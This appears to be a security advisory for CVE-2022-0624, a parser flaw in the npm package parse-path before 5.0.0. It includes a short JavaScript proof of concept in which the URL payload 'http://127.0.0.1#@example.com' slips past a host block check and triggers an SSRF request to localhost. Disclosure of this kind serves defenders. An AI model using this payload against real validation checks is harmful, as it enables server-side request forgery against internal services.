Headline
CVE-2022-0624: Authorization Bypass Through User-Controlled Key in parse-path
Authorization Bypass Through User-Controlled Key in GitHub repository ionicabizau/parse-path prior to 5.0.0.
Description
parse-path is unable to detect the right resource. While parsing http://127.0.0.1#@example.com url, parse-path thinks that the host/resource is example.com, however the actual resource is 127.0.0.1.
Proof of Concept
SSRF PoC
const parsePath = require("parse-path");
const axios = require('axios');
var PAYLOAD = "http://127.0.0.1#@example.com";
parsedData = parsePath(PAYLOAD);
// Blacklist few domains
if (parsedData.resource !== '127.0.0.1') {
console.log("BYPASSED...");
axios.get(PAYLOAD).then(function (resp) {
console.log("Sent the request to " + resp.request._currentUrl);
})
.catch(function (error) {
console.log("Sent the request to " + error.request._currentUrl);
});
}
OUTPUT:
BYPASSED...
Sent the request to http://127.0.0.1/
Impact
An attacker can bypass the host-validation checks which can lead to SSRF, open redirect and other similar vulnerabilities. The above PoC bypass SSRF checks as axios will load 127.0.0.1 rather than example.com
Occurrences
Related news
GHSA-3j8f-xvm3-ffx4: Authorization Bypass in parse-path
Authorization Bypass Through User-Controlled Key in GitHub repository ionicabizau/parse-path prior to 5.0.0.